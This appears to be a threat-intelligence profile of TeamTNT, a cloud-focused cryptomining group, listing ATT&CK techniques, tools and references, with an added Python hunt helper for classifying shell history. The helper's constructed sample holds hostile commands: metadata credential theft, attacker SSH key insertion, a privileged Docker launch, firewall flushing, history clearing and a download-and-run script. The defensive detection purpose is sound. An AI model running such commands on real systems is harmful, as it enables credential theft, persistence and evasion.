Introduction
TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. [9][10][6][3][4][5][2][8][7]
Activities and Tactics
Information pending cataloguing.
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1680 Local Storage Discovery
- T1686 Disable or Modify System Firewall
- T1133 External Remote Services
- T1219 Remote Access Tools
- T1569.003 Systemctl
- T1036.005 Match Legitimate Resource Name or Location
- T1222.002 Linux and Mac Permissions
- T1070.004 File Deletion
- T1609 Container Administration Command
- T1059.004 Unix Shell
- T1547.001 Registry Run Keys / Startup Folder
- T1543.002 Systemd Service
- T1136.001 Local Account
- T1007 System Service Discovery
- T1049 System Network Connections Discovery
- T1543.003 Windows Service
- T1608.001 Upload Malware
- T1059.003 Windows Command Shell
- T1610 Deploy Container
- T1613 Container and Resource Discovery
- T1048 Exfiltration Over Alternative Protocol
- T1057 Process Discovery
- T1059.001 PowerShell
- T1552.005 Cloud Instance Metadata API
- T1070.003 Clear Command History
- T1074.001 Local Data Staging
- T1595.002 Vulnerability Scanning
- T1059.013 Container CLI/API
- T1027.002 Software Packing
- T1204.003 Malicious Image
- T1014 Rootkit
- T1552.004 Private Keys
- T1611 Escape to Host
- T1595.001 Scanning IP Blocks
- T1105 Ingress Tool Transfer
- T1518.001 Security Software Discovery
- T1496.001 Compute Hijacking
- T1083 File and Directory Discovery
- T1021.004 SSH
- T1036 Masquerading
- T1140 Deobfuscate/Decode Files or Information
- T1082 System Information Discovery
- T1027.013 Encrypted/Encoded File
- T1016 System Network Configuration Discovery
- T1046 Network Service Discovery
- T1120 Peripheral Device Discovery
- T1685 Disable or Modify Tools
- T1071 Application Layer Protocol
- T1098.004 SSH Authorized Keys
- T1583.001 Domains
- T1059.009 Cloud API
- T1071.001 Web Protocols
- T1552.001 Credentials In Files
- T1685.006 Clear Linux or Mac System Logs
- T1587.001 Malware
- T1102 Web Service
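A hunt helper, added here as an example and not code from TeamTNT or from any of the cited reports: it maps recorded shell commands (for example a root user's bash history or auditd EXECVE lines flattened to one command per line) to a subset of the techniques listed above using generic behavioural patterns. The technique-to-pattern mapping is the editor's own heuristic choice for illustration, the sample history is constructed, and the 203.0.113.10 address is from the documentation range; none of the patterns are actor-specific indicators.

```python
"""Hunt helper: map recorded shell commands to a subset of the ATT&CK techniques
listed above. Added example; patterns are generic behaviours, not TeamTNT IOCs."""
import re
from collections import defaultdict

# Technique ID -> generic command pattern. Assumption: these heuristics are the
# editor's, chosen to illustrate the listed techniques, not taken from any report.
TECHNIQUE_PATTERNS = {
    # Cloud Instance Metadata API: IMDS endpoints used to pull instance credentials
    "T1552.005": re.compile(r"169\.254\.169\.254|metadata\.google\.internal", re.I),
    # SSH Authorized Keys: appending keys for persistence
    "T1098.004": re.compile(r"authorized_keys", re.I),
    # Clear Command History
    "T1070.003": re.compile(r"history\s+-c|unset\s+HISTFILE|HISTSIZE=0|>\s*\S*\.bash_history", re.I),
    # Ingress Tool Transfer: download piped to a shell or saved to disk
    "T1105": re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|-O\b|-o\s)", re.I),
    # Container Administration Command: docker run/exec/create, daemon socket or TCP port
    "T1609": re.compile(r"\bdocker\b.*\b(run|exec|create)\b|docker\.sock|:2375\b", re.I),
    # Escape to Host: privileged container, host root mount or host PID namespace
    "T1611": re.compile(r"--privileged|-v\s+/:/|--pid=host", re.I),
    # Disable or Modify System Firewall
    "T1686": re.compile(r"iptables\s+-F|ufw\s+disable", re.I),
    # Disable or Modify Tools: SELinux or AppArmor turned off
    "T1685": re.compile(r"setenforce\s+0|aa-teardown|systemctl\s+(stop|disable)\s+apparmor", re.I),
}


def classify_line(line: str) -> list[str]:
    """Return the sorted technique IDs whose pattern matches one command line."""
    return sorted(tid for tid, rx in TECHNIQUE_PATTERNS.items() if rx.search(line))


def hunt(lines) -> dict[str, list[int]]:
    """Map technique ID -> 1-based line numbers where the behaviour was observed."""
    hits = defaultdict(list)
    for n, line in enumerate(lines, 1):
        for tid in classify_line(line):
            hits[tid].append(n)
    return dict(hits)


# Constructed sample of a root user's shell history (not a real capture).
SAMPLE_HISTORY = [
    "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "echo 'ssh-rsa AAAA... attacker' >> /root/.ssh/authorized_keys",
    "docker -H tcp://10.0.0.5:2375 run -d --privileged alpine sh",
    "iptables -F",
    "history -c; unset HISTFILE",
    "ls -la /var/log",
    "wget -q -O /tmp/x.sh http://203.0.113.10/x.sh && sh /tmp/x.sh",
    "setenforce 0",
]


if __name__ == "__main__":
    for tid, where in sorted(hunt(SAMPLE_HISTORY).items()):
        print(f"{tid}: lines {where}")
```

Line 3 of the sample is tagged with both T1609 and T1611: the same command is a container administration action and, because of `--privileged`, a host-escape setup. A single line can legitimately map to several techniques, so the output keeps every match rather than picking a "best" one.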
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
Information pending cataloguing.
MITRE ATT&CK Software
- Peirates (S0683) - tool
- MimiPenguin (S0179) - tool
- LaZagne (S0349) - tool
- Hildegard (S0601) - malware
Attribution and Evidence
Information pending cataloguing.
References
[1] MITRE ATT&CK. Group profile: TeamTNT.
[2] AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.
[3] Cado Security. (2020, August 16). Team TNT - The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.
[4] Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
[5] Fiser, D., Oliveira, A. (n.d.). Tracking the Activities of TeamTNT: A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
[6] Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
[7] Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.
[8] Kol, R., Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.
[9] Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.
[10] Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 16, 2024.